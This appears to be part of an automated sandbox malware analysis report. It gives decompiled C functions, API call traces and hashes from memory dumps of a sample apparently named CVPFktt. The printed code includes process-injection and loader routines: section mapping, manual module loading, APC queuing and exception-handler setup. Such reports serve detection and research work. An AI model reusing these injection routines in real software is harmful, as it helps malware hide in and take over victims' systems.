Part of subcall function 001C73BD: HeapFree.KERNEL32(00000000,?), ref: 001C7440

RtlExitUserThread.NTDLL(00000000), ref: 001DAFA7
GetSystemTimeAsFileTime.KERNEL32(?), ref: 001DAFB9
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 001DAFC8
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 001DB05C
GetModuleHandleA.KERNEL32(00000000), ref: 001DB067
RtlExitUserThread.NTDLL(00000000), ref: 001DB078

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Thread$CriticalExitHeapSectionTimeUser$CreateEnterFileFreeHandleInformationLeaveModuleQuerySystem
String ID:
API String ID: 3402998572-0
Opcode ID: 71ab6db40958aa1bcdad93a90303658e57ec2529ddf6e6e5f102cc70a982e129
Instruction ID: 59b4465040a967869bc14a1287a290d3bc0d717e06ca96e5f1dadae1226e4008
Opcode Fuzzy Hash: 71ab6db40958aa1bcdad93a90303658e57ec2529ddf6e6e5f102cc70a982e129
Instruction Fuzzy Hash: A501F171204284BFDB209BB5DC89FAF7B7EEB81760F400126F226C95E0D7B48585C7A1

Uniqueness

Uniqueness Score: 100.00%

Function 001DAFAE, Relevance: 7.6, APIs: 5, Instructions: 77threadmemorynativeUNIQUE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 001DAFB9
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 001DAFC8
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 001DB05C
GetModuleHandleA.KERNEL32(00000000), ref: 001DB067
RtlExitUserThread.NTDLL(00000000), ref: 001DB078

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ThreadTime$CreateExitFileHandleHeapInformationModuleQuerySystemUser
String ID:
API String ID: 3158473699-0
Opcode ID: b4a221e2e3eb588f35afc2a939363228e267c05c8d3bbe3f50dbe6dcc0881b21
Instruction ID: 5a599032acd6911ccf17f428b667af1d44d76b780a9d4892d7f721e7279a684c
Opcode Fuzzy Hash: b4a221e2e3eb588f35afc2a939363228e267c05c8d3bbe3f50dbe6dcc0881b21
Instruction Fuzzy Hash: 17219271500154FBCB21ABB4DCC9F9F7BBD9B64790F45412AF526EA290E7748980C790

Uniqueness

Uniqueness Score: 100.00%

Function 004011AA, Relevance: 6.0, APIs: 4, Instructions: 38
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004011AA() {
				void* __esi;
				intOrPtr* _t7;
				long _t8;
				long _t11;
				struct _CRITICAL_SECTION* _t12;

				_t12 = E004018B8(0x28);
				if(_t12 == 0) {
					_t11 = 8;
					L7:
					return _t11;
				}
				_t1 = _t12 + 0x18; // 0x18
				_t7 = _t1;
				 *((intOrPtr*)(_t12 + 0x1c)) = _t7;
				 *_t7 = _t7;
				InitializeCriticalSection(_t12);
				_t8 = TlsAlloc();
				 *(_t12 + 0x24) = _t8;
				if(_t8 == 0xffffffff) {
					L4:
					_t11 = GetLastError();
					if(_t11 != 0) {
						E00401844(_t12, _t12);
					}
					goto L7;
				}
				__imp__AddVectoredExceptionHandler(1, E00401AC9); // executed
				 *(_t12 + 0x20) = _t8;
				if(_t8 == 0) {
					goto L4;
				}
				 *0x404114 = _t12;
				_t11 = 0;
				goto L7;
			}

0x004011b3
0x004011b7
0x0040120a
0x0040120b
0x0040120f
0x0040120f
0x004011b9
0x004011b9
0x004011bd
0x004011c0
0x004011c2
0x004011c8
0x004011d1
0x004011d4
0x004011f4
0x004011fa
0x004011fe
0x00401201
0x00401201
0x00000000
0x004011fe
0x004011dd
0x004011e5
0x004011e8
0x00000000
0x00000000
0x004011ea
0x004011f0
0x00000000

APIs

Part of subcall function 004018B8: HeapAlloc.KERNEL32(00000000,?,004011B3,00000028,?,00400000,00401D89,?,00000000,?,?,?,00401BA3), ref: 004018C4

InitializeCriticalSection.KERNEL32(00000000,00000028,?,00400000,00401D89,?,00000000,?,?,?,00401BA3), ref: 004011C2
TlsAlloc.KERNEL32(?,00400000,00401D89,?,00000000,?,?,?,00401BA3), ref: 004011C8
RtlAddVectoredExceptionHandler.NTDLL(00000001,00401AC9,?,00400000,00401D89,?,00000000,?,?,?,00401BA3), ref: 004011DD
GetLastError.KERNEL32(?,00400000,00401D89,?,00000000,?,?,?,00401BA3), ref: 004011F4

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: Alloc$CriticalErrorExceptionHandlerHeapInitializeLastSectionVectored
String ID:
API String ID: 628750512-0
Opcode ID: 8d170e0977c153e3ba9498574d9c403115b3ec3f6fda379eaa2609b0b6c73175
Instruction ID: 402f4e09ef669a8431b94e10dbe2a1c4bb72731dce44c1965352c4ec3ed6476d
Opcode Fuzzy Hash: 8d170e0977c153e3ba9498574d9c403115b3ec3f6fda379eaa2609b0b6c73175
Instruction Fuzzy Hash: F5F0C2356026009BC3329F3A9D08A477AE8BF85712710073FA215F62F1DB34C9028BA9

Uniqueness

Uniqueness Score: 2.98%

Function 001C11F3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeUNIQUE

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 001C1250

Part of subcall function 001D154B: NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 001D1579

memset.NTDLL ref: 001C1274

Strings

@, xrefs: 001C1240

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 68dad0cdc77fc111496d4fb7b02695d044691307f10d8b086033fcb2dc378fcb
Instruction ID: 1c762acce0b367d9d701d3fe390b1e9f015b6185e1e6038f9d5d0107b4cebe70
Opcode Fuzzy Hash: 68dad0cdc77fc111496d4fb7b02695d044691307f10d8b086033fcb2dc378fcb
Instruction Fuzzy Hash: 99214DB6D00209AFDB10DFA9C8809EEFBB9EF58354F20452DE516F3250D7309A448F60

Uniqueness

Uniqueness Score: 23.02%

Function 0040150E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeUNIQUE

Download Yara Rule

C-Code - Quality: 72%

			E0040150E(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E004020BF(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00401517
0x0040151e
0x0040151f
0x00401520
0x00401521
0x00401522
0x00401533
0x00401537
0x0040154b
0x0040154e
0x00401551
0x00401558
0x0040155b
0x00401562
0x00401565
0x00401568
0x0040156b
0x00401570
0x004015ab
0x00401572
0x00401575
0x0040157b
0x00401580
0x00401584
0x004015a2
0x00401586
0x0040158d
0x0040159b
0x0040159b
0x00401584
0x004015b3

APIs

NtCreateSection.NTDLL(00000000,000F001F,?,?,?,08000000,00000000,779F4EE0,00000000,00000000,00000000), ref: 0040156B

Part of subcall function 004020BF: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401580,00000002,00000000,?,?,00000000,?,?,00401580,00000002), ref: 004020EC

memset.NTDLL ref: 0040158D

Strings

@, xrefs: 0040155B

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 9cb90565f78e5c11ff4960394f608456836ca318c7b559c33b0635c3362892a9
Instruction ID: 3601cd8e05059436fa5c761f38b7496d05d9c5bafcfe0d598be63c238dc5c560
Opcode Fuzzy Hash: 9cb90565f78e5c11ff4960394f608456836ca318c7b559c33b0635c3362892a9
Instruction Fuzzy Hash: C0214DB5D00209AFCB11DFA9C8849EEFBB9EF48304F50443AE606F7250D7359A458B65

Uniqueness

Uniqueness Score: 23.02%

Function 001CFE1C, Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(001DA726,00000000,00000000,001DA726,00003000,00000040), ref: 001CFE4D
RtlNtStatusToDosError.NTDLL(00000000), ref: 001CFE54
SetLastError.KERNEL32(00000000), ref: 001CFE5B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Error$AllocateLastMemoryStatusVirtual
String ID:
API String ID: 722216270-0
Opcode ID: 5de10115f5e9c86bbb7b17a7818e1792d06b3fd4369bd11b9164c06c9d4a351a
Instruction ID: 752399201efb56d340b097879fae6a902dabe47a47ae9e7cdef8fd3c78369ea6
Opcode Fuzzy Hash: 5de10115f5e9c86bbb7b17a7818e1792d06b3fd4369bd11b9164c06c9d4a351a
Instruction Fuzzy Hash: 38F0FEB1610309FBEB05CBD4DD59FAE77BCAB14305F10405CB600AA090EBB4EB44DB64

Uniqueness

Uniqueness Score: 0.24%

Function 001D732E, Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,001DA7C8,00000000,?,001DA7C8,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 001D734C
RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D735B
SetLastError.KERNEL32(00000000,?,001DA7C8,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 001D7362

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Error$LastMemoryStatusVirtualWrite
String ID:
API String ID: 1089604434-0
Opcode ID: 47b9154a01bb7138b0053ceb0c97f3a7e6f472db07f3dc17a1dfd7b76454a2fd
Instruction ID: 7cba6d8c58b600535cc3a3da1c26674c14fdfd2084493b4a0670833b91383759
Opcode Fuzzy Hash: 47b9154a01bb7138b0053ceb0c97f3a7e6f472db07f3dc17a1dfd7b76454a2fd
Instruction Fuzzy Hash: C0E01A3220425ABBCF025FE49C08D9E7B6EBB08B40B044021FF01DA660E731D961BBA0

Uniqueness

Uniqueness Score: 0.24%

Function 004017B2, Relevance: 3.1, APIs: 2, Instructions: 65
nativeUNIQUE

Download Yara Rule

C-Code - Quality: 86%

			E004017B2(void* __eax, void* __edx) {
				char _v8;
				void** _v12;
				void* __ebx;
				void* _t17;
				long _t19;
				long _t23;
				long _t25;
				char _t28;
				void* _t31;
				long _t33;
				void* _t35;
				void** _t36;
				void* _t38;

				_t31 = __edx;
				_t35 = __eax;
				_t17 = E004015E5( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t33 = 8;
					goto L8;
				} else {
					_t28 = _v8;
					_t19 = E00401979( &_v8, _t28, _t35); // executed
					_t33 = _t19;
					if(_t33 == 0) {
						_t38 =  *((intOrPtr*)(_t28 + 0x3c)) + _t28;
						_t23 = E00401E55(_t28, _t38); // executed
						_t33 = _t23;
						if(_t33 == 0) {
							_t25 = E004018CD(_t38, _t31, _t28);
							_t33 = _t25;
							if(_t33 == 0) {
								_push(_t25);
								_push(1);
								_push(_t28);
								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t28))() == 0) {
									_t33 = GetLastError();
								}
							}
						}
					}
					_t36 = _v12;
					_t36[6](NtClose( *_t36));
					E004010A3(_t36);
					L8:
					return _t33;
				}
			}

0x004017b2
0x004017ba
0x004017d7
0x004017de
0x0040183c
0x00000000
0x004017e0
0x004017e0
0x004017e5
0x004017ea
0x004017ee
0x004017f3
0x004017f6
0x004017fb
0x004017ff
0x00401804
0x00401809
0x0040180d
0x00401812
0x00401813
0x00401817
0x0040181c
0x00401824
0x00401824
0x0040181c
0x0040180d
0x004017ff
0x00401826
0x0040182f
0x00401833
0x0040183d
0x00401843
0x00401843

APIs

Part of subcall function 004015E5: GetModuleHandleA.KERNELBASE(?,?,00000000,?,?,?,?,?,004017DC,?,?,?,00000000,00000002,?,?), ref: 0040160A
Part of subcall function 004015E5: GetProcAddress.KERNELBASE(00000000,?), ref: 0040162C
Part of subcall function 004015E5: GetProcAddress.KERNELBASE(00000000,?), ref: 00401642
Part of subcall function 004015E5: GetProcAddress.KERNELBASE(00000000,?), ref: 00401658
Part of subcall function 004015E5: GetProcAddress.KERNELBASE(00000000,?), ref: 0040166E
Part of subcall function 004015E5: GetProcAddress.KERNELBASE(00000000,?), ref: 00401684

Part of subcall function 00401979: memcpy.NTDLL(00000002,00000000,?,00000000,?,?,?,?,004017EA,?,?,?,?,?,00000000,00000002), ref: 004019A6
Part of subcall function 00401979: memcpy.NTDLL(00000002,00000000,?,00000000,00000002,?,?), ref: 004019D9

NtClose.NTDLL(?,?,?,?,?,?,00000000,00000002,?,?), ref: 0040182B

Part of subcall function 00401E55: LoadLibraryA.KERNELBASE(?,?,00000000,?,?,?,00000000), ref: 00401E87
Part of subcall function 00401E55: lstrlenA.KERNEL32(?), ref: 00401E9D
Part of subcall function 00401E55: memset.NTDLL ref: 00401EA7
Part of subcall function 00401E55: GetProcAddress.KERNEL32(?,00000002), ref: 00401F0A
Part of subcall function 00401E55: lstrlenA.KERNEL32(-00000002), ref: 00401F1F
Part of subcall function 00401E55: memset.NTDLL ref: 00401F29

Part of subcall function 004018CD: VirtualProtect.KERNEL32(00000000,?,00000004,00000000,00000000,?,?,?,00000000), ref: 004018FB
Part of subcall function 004018CD: VirtualProtect.KERNEL32(00000000,00000000,00000004,?), ref: 00401952
Part of subcall function 004018CD: GetLastError.KERNEL32(?,?), ref: 00401958

GetLastError.KERNEL32(?,?), ref: 0040181E

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$CloseHandleLibraryLoadModule
String ID:
API String ID: 2954739140-0
Opcode ID: b09f97690f9294a8d2348671840e95169dd5c15c809a465dd2706bf15a8a9397
Instruction ID: d9d9c4a6eb9a353c6ed88219279488500e539b27dae62ec5d0a50083b27b2e24
Opcode Fuzzy Hash: b09f97690f9294a8d2348671840e95169dd5c15c809a465dd2706bf15a8a9397
Instruction Fuzzy Hash: A11173779006106BD722AAA98C41A5B76ACDF443A4B15413AFD41F73A1EA38EE0587A8

Uniqueness

Uniqueness Score: 23.02%

Function 001CB5B8, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderUNIQUE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F57775A,00000000), ref: 001CB5E1
NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,001C721C,00000000,00000000,00000028,00000100), ref: 001CB603

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AddressMemory64ProcReadVirtualWow64
String ID:
API String ID: 752694512-0
Opcode ID: ee30d75b327d44297c3dd7d35e46dfb980623c9804db42353974867d13b030b3
Instruction ID: 6339e81c7088199c212ca8f454891db3ba42c2ec65215671e9c85540ca06f1cf
Opcode Fuzzy Hash: ee30d75b327d44297c3dd7d35e46dfb980623c9804db42353974867d13b030b3
Instruction Fuzzy Hash: 46F0F971500149AFCB018F8ADC81D9EBBBAFBA4390B544019F905C6520D771DA91DB50

Uniqueness

Uniqueness Score: 37.75%

Function 004020BF, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004020BF(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x004020d1
0x004020d7
0x004020e5
0x004020ec
0x004020f1
0x004020f7
0x00000000
0x004020f8
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401580,00000002,00000000,?,?,00000000,?,?,00401580,00000002), ref: 004020EC

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: d081dc0500db9b59b86bb368248a150d8839a6a9a93f9c9d81586b27dcd44730
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 79F012B590420CBFDB119FA5CC89C9FBBBDEB44394B10893AB252E1090D6709E089A61

Uniqueness

Uniqueness Score: 0.01%

Function 001D154B, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 001D1579

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
Instruction ID: 06b08eeef78f12716c0bcc9ed750f8d38a2f8d095301fe2f911d1d35c20c320e
Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
Instruction Fuzzy Hash: AAF012B690020CFFDB119FA5DC85CDFBBBDEB58344B10886AF542D1150D3359E189B60

Uniqueness

Uniqueness Score: 0.01%

Function 00410B5B, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001B19), ref: 00410B60

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9aa43cf1833345d8f3c500713c024e2d5cf1b3198d60fde5fc8740973d1d44d3
Instruction ID: 16e1bfd1f27dd3f9f5f6ef00d4e4dde907e9e8115757722a30e672f69b6ef0dc
Opcode Fuzzy Hash: 9aa43cf1833345d8f3c500713c024e2d5cf1b3198d60fde5fc8740973d1d44d3
Instruction Fuzzy Hash: FE9002703551844A9B0027B06D0D64A2690AA4974E7550871B042D446CDBB450C05519

Uniqueness

Uniqueness Score: 0.01%

Function 001C7853, Relevance: 21.1, APIs: 14, Instructions: 126
memorysynchronizationUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,001D7E0D), ref: 001C787C
RtlDeleteCriticalSection.NTDLL(001E6320), ref: 001C78AF
RtlDeleteCriticalSection.NTDLL(001E6340), ref: 001C78B6
ReleaseMutex.KERNEL32(0000030C,00000000,?,?,?,001D7E0D), ref: 001C78DF
FindCloseChangeNotification.KERNELBASE(?,?,001D7E0D), ref: 001C78EB
ResetEvent.KERNEL32(00000000,00000000,?,?,?,001D7E0D), ref: 001C78F7
CloseHandle.KERNEL32(?,?,001D7E0D), ref: 001C7903
SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,001D7E0D), ref: 001C7909
SleepEx.KERNELBASE(00000064,00000001,?,?,001D7E0D), ref: 001C791D
HeapFree.KERNEL32(00000000,00000000,?,?,001D7E0D), ref: 001C7941
RtlRemoveVectoredExceptionHandler.NTDLL(00AD9BE0), ref: 001C7977
SleepEx.KERNELBASE(00000064,00000001,?,?,001D7E0D), ref: 001C7993
FindCloseChangeNotification.KERNELBASE(03E597A8,?,?,001D7E0D), ref: 001C79BC
LocalFree.KERNEL32(?,?,001D7E0D), ref: 001C79CC

Part of subcall function 001C79D7: GetVersion.KERNEL32(?,?,77A4F720,?,001C786B,00000000,?,?,?,001D7E0D), ref: 001C79FB
Part of subcall function 001C79D7: GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,77A4F720,?,001C786B,00000000,?,?,?,001D7E0D), ref: 001C7A0F
Part of subcall function 001C79D7: GetProcAddress.KERNEL32(00000000), ref: 001C7A16

Part of subcall function 001D528A: RtlEnterCriticalSection.NTDLL(001E6340), ref: 001D5294
Part of subcall function 001D528A: RtlLeaveCriticalSection.NTDLL(001E6340), ref: 001D52D0

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalSectionSleep$Close$ChangeDeleteFindFreeHandleNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
String ID:
API String ID: 1259384122-0
Opcode ID: 23b8e3ed172e811b0cfd2db3a8523f5db44d1dbef621f1d43798bd8d9721c587
Instruction ID: f469edb6f8ee6591703583095f699fb4c0cd086e33095f07d09001c582a8bce7
Opcode Fuzzy Hash: 23b8e3ed172e811b0cfd2db3a8523f5db44d1dbef621f1d43798bd8d9721c587
Instruction Fuzzy Hash: 28413E316042A59BDB20AFA5DCC6F1D77A9AB307A4B450029F604DB9E1DBB1EC84CF61

Uniqueness

Uniqueness Score: 100.00%

Function 00401B85, Relevance: 19.6, APIs: 13, Instructions: 100
threadsynchronizationinjectionUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00401B85(void* __ecx) {
				long _v8;
				long _v12;
				void* _v36;
				long _t17;
				void* _t20;
				long _t24;
				long _t25;
				long _t29;
				void* _t32;
				intOrPtr _t35;
				void* _t44;
				void* _t46;
				intOrPtr* _t48;

				_t17 = E00401210();
				_v8 = _t17;
				if(_t17 == 0) {
					_t17 = E00401D77(__ecx); // executed
					_v8 = _t17;
					if(_t17 == 0) {
						if(E0040203D(__ecx,  &_v12) != 0) {
							 *0x4040f8 = 0;
						} else {
							_t48 = __imp__GetLongPathNameW;
							_t32 =  *_t48(_v12, 0, 0); // executed
							_t44 = _t32;
							if(_t44 == 0) {
								L6:
								 *0x4040f8 = _v12;
							} else {
								_t6 = _t44 + 2; // 0x2
								_t35 = E004018B8(_t44 + _t6);
								 *0x4040f8 = _t35;
								if(_t35 == 0) {
									goto L6;
								} else {
									 *_t48(_v12, _t35, _t44); // executed
									E004010A3(_v12);
								}
							}
						}
						_t20 = CreateThread(0, 0, __imp__SleepEx,  *0x404100, 0, 0); // executed
						_t46 = _t20;
						if(_t46 == 0) {
							L15:
							_v8 = GetLastError();
						} else {
							_t24 = QueueUserAPC(E00401F72, _t46,  &_v36); // executed
							if(_t24 == 0) {
								_t29 = GetLastError();
								_v12 = _t29;
								TerminateThread(_t46, _t29);
								CloseHandle(_t46);
								_t46 = 0;
								SetLastError(_v12);
							}
							if(_t46 == 0) {
								goto L15;
							} else {
								_t25 = WaitForSingleObject(_t46, 0xffffffff);
								_v8 = _t25;
								if(_t25 == 0) {
									GetExitCodeThread(_t46,  &_v8); // executed
								}
								FindCloseChangeNotification(_t46); // executed
							}
						}
						_t17 = _v8;
						if(_t17 == 0xffffffff) {
							return GetLastError();
						}
					}
				}
				return _t17;
			}

0x00401b8c
0x00401b95
0x00401b98
0x00401b9e
0x00401ba5
0x00401ba8
0x00401bbb
0x00401bfe
0x00401bbd
0x00401bbd
0x00401bc8
0x00401bca
0x00401bce
0x00401bf4
0x00401bf7
0x00401bd0
0x00401bd0
0x00401bd5
0x00401bdc
0x00401be1
0x00000000
0x00401be3
0x00401be8
0x00401bed
0x00401bed
0x00401be1
0x00401bce
0x00401c14
0x00401c1a
0x00401c24
0x00401c7f
0x00401c81
0x00401c26
0x00401c30
0x00401c3e
0x00401c40
0x00401c44
0x00401c47
0x00401c4e
0x00401c53
0x00401c55
0x00401c55
0x00401c5d
0x00000000
0x00401c5f
0x00401c62
0x00401c6a
0x00401c6d
0x00401c74
0x00401c74
0x00401c7b
0x00401c7b
0x00401c5d
0x00401c84
0x00401c8c
0x00000000
0x00401c8e
0x00401c8c
0x00401ba8
0x00401c92

APIs

Part of subcall function 00401210: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401B91), ref: 0040121F
Part of subcall function 00401210: GetVersion.KERNEL32 ref: 0040122E
Part of subcall function 00401210: GetCurrentProcessId.KERNEL32 ref: 00401245
Part of subcall function 00401210: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0040125E

Part of subcall function 0040203D: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,?,00000000,?,?,?,00401BB9,?,?,00000000), ref: 00402066

GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401BC8
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401BE8

Part of subcall function 004010A3: HeapFree.KERNEL32(00000000,?,004018B2,?,00000000,?,00000000,00401206,00000000,?,00400000,00401D89,?,00000000), ref: 004010AF

CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 00401C14
QueueUserAPC.KERNELBASE(00401F72,00000000,?,?,00000000), ref: 00401C30
GetLastError.KERNEL32(?,00000000), ref: 00401C40
TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401C47
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401C4E
SetLastError.KERNEL32(?,?,00000000), ref: 00401C55
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401C62
GetExitCodeThread.KERNELBASE(00000000,?,?,00000000), ref: 00401C74
FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 00401C7B
GetLastError.KERNEL32(?,00000000), ref: 00401C7F

Part of subcall function 004018B8: HeapAlloc.KERNEL32(00000000,?,004011B3,00000028,?,00400000,00401D89,?,00000000,?,?,?,00401BA3), ref: 004018C4

GetLastError.KERNEL32 ref: 00401C8E

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: ErrorLast$NameThread$CloseCreateHeapLongPathProcess$AllocChangeCodeCurrentEventExitFileFindFreeHandleModuleNotificationObjectOpenQueueSingleTerminateUserVersionWait
String ID:
API String ID: 2340672153-0
Opcode ID: 14d46147fda1bad7c1b9f83ad616fa8c1c1e1239eb8c469f12de2b7bb2653a03
Instruction ID: 2acce413fd6e168763e81bf82c3e86a7cba0ae88f6b65675b6b700704a329e58
